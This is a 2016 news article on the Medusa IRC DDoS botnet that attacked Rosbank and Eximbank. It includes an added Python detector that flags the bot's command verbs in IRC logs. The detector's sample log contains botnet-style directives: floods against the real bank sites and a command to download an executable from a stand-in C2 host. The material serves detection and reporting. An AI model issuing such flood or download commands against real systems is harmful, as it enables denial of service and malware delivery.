Medusa DDoS Botnet Slams Russian Banks

Friday, November 18, 2016

Ionut Arghire


A new IRC bot used to carry out distributed denial of service (DDoS) attacks against the websites of two Russian banks has emerged recently, researchers with the Russian security firm Doctor Web reveal.

Dubbed Trojan BackDoor.IRC.Medusa.1, the new piece of malware was used in DDoS attacks targeting the Rosbank and Eximbank banks, the security researchers say. The Trojan's main purpose is launching DDoS attacks, and Doctor Web says that this specific malware might also have been used in the recent attack on Sberbank.

Belonging to the IRC bot category, the Trojan joins forces with other infected machines to form a botnet. Bots of this type receive commands over the IRC (Internet Relay Chat) protocol: each infected host connects to a specific channel on the operators' IRC server and waits for directives posted there.

The analyzed Medusa Trojan sample was heavily obfuscated in an attempt to hinder analysis, the researchers explain. Once installed on a compromised system, the malware checks whether specific applications are present, to determine whether it is running in a sandboxed or analysis environment. It also adds an autorun entry to the Windows registry so that it is started again after every reboot.

Doctor Web researchers have discovered that Medusa is being actively promoted on the underground, where its creators claim that a botnet of just 100 infected computers can generate 20,000-25,000 requests per second, peaking at 30,000. A diagram of an alleged test attack on an NGINX HTTP server is offered as proof.

The Medusa IRC bot was designed with support for several types of DDoS attacks, but it also has the ability to download and run executable files on the infected computers, which turns it into a generic malware loader. The malware's authors even published a botnet operator manual detailing the full list of commands the Trojan supports.

These commands include the attack verbs httpstrong, httppost, httpseebix and smartflood GET (each with a matching stop, plus a stop-all command that halts every running attack at once), along with silent on/off, download, join channel, update and resetnick. Login and logout commands are also available.
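Because the bots take their orders as plain channel messages, the command names above double as detection content: anyone who can see the IRC traffic (a sandbox, an IDS, a captured IRC server log) can flag the verbs and recover the attack targets. The following is an added example, not code from the Doctor Web report or from the Medusa operator manual. It parses raw IRC lines, classifies PRIVMSGs that carry one of the listed verbs, and tallies flood targets by hostname. The argument layout after each verb (an optional HTTP method, then the target URL) is an assumption, since the page does not document the syntax; the sample traffic, nicknames, channel and C2 hostnames are constructed for the example.

```python
"""Flag Medusa-style IRC C2 commands in captured IRC traffic or IRC-server logs."""
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# Command names are the ones Doctor Web lists for the Medusa bot.
# How arguments follow each verb (method, target URL, duration) is NOT
# documented in the report; the layout handled below is an assumption.
ATTACK_VERBS = {"httpstrong", "httppost", "httpseebix", "smartflood"}
CONTROL_VERBS = {"stop-all", "silent", "download", "join", "update",
                 "resetnick", "login", "logout"}


@dataclass
class Alert:
    kind: str                # "attack", "stop" or "control"
    nick: str                # who issued the directive
    channel: str             # IRC channel it was posted to
    command: str             # verb, lower-cased
    argument: Optional[str]  # target URL for attacks, first argument otherwise


def parse_irc(line: str):
    """Split one raw IRC line into (nick, command, params, trailing)."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):                      # optional ":nick!user@host " prefix
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")    # " :" starts the trailing parameter
    parts = head.split()
    if not parts:
        return None
    nick = prefix.split("!", 1)[0]
    return nick, parts[0].upper(), parts[1:], (trailing if sep else None)


def classify(line: str) -> Optional[Alert]:
    """Return an Alert if the line is a channel message carrying a bot verb."""
    parsed = parse_irc(line)
    if parsed is None:
        return None
    nick, cmd, params, trailing = parsed
    if cmd != "PRIVMSG" or not params or not trailing:
        return None
    channel = params[0]
    words = trailing.split()
    if not words:
        return None
    verb, args = words[0].lower(), words[1:]
    if verb in ATTACK_VERBS:
        # "<verb> stop" halts that flood type (each attack verb has a
        # matching stop, per the report); anything else starts one.
        if args and args[0].lower() == "stop":
            return Alert("stop", nick, channel, verb, None)
        if args and args[0].upper() in {"GET", "POST"}:  # e.g. "smartflood GET <url>"
            args = args[1:]
        return Alert("attack", nick, channel, verb, args[0] if args else None)
    if verb in CONTROL_VERBS:
        return Alert("control", nick, channel, verb, args[0] if args else None)
    return None


def scan(lines) -> List[Alert]:
    """Run classify() over a log and keep only the hits."""
    return [a for a in map(classify, lines) if a is not None]


def attack_targets(alerts) -> Counter:
    """Count flood targets by hostname, the first thing an IR team asks for."""
    hosts = Counter()
    for a in alerts:
        if a.kind == "attack" and a.argument:
            hosts[urlsplit(a.argument).hostname or a.argument] += 1
    return hosts


# Constructed sample traffic (not from the Doctor Web report): nicks, hosts
# and the channel are invented; the target sites are the ones named above.
SAMPLE_LOG = [
    "PING :irc.c2.example",
    ":medusa_op!op@c2.example PRIVMSG #medusa :login hunter2",
    ":medusa_op!op@c2.example PRIVMSG #medusa :httpstrong http://rosbank.ru/ 300",
    ":medusa_op!op@c2.example PRIVMSG #medusa :smartflood GET http://eximbank.ru/ 300",
    ":bot1337!x@victim.example PRIVMSG #medusa :ok",
    ":medusa_op!op@c2.example PRIVMSG #medusa :httpstrong stop",
    ":medusa_op!op@c2.example PRIVMSG #medusa :stop-all",
    ":medusa_op!op@c2.example PRIVMSG #medusa :download http://c2.example/upd.exe",
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"{a.kind:8} {a.command:10} {a.argument or '':40} from {a.nick} in {a.channel}")
    print("targets:", dict(attack_targets(found)))
```

Feed it the output of `tcpflow` or an IRC server's channel log one line at a time; the download verb is worth alerting on by itself, since it is the loader path the article describes, and the per-host tally is what you hand to the affected sites.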

The security researchers identified 314 active connections on one of the IRC channels controlling the Medusa botnet. Inspecting the channel's command log, they found that the botnet's operators attacked a series of sites repeatedly between November 11 and November 14, 2016, including rosbank.ru (Rosbank), eximbank.ru (Eximbank), fr.livraison.lu and en.livraison.lu (the Livraison restaurant chain) and korytov-photographer.ru (a private website).

Related: Battling the Botnet Armies

Related: Mirai Botnet Infects Devices in 164 Countries

Related: Self-Spreading Linux Trojan Creates P2P Botnet

The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.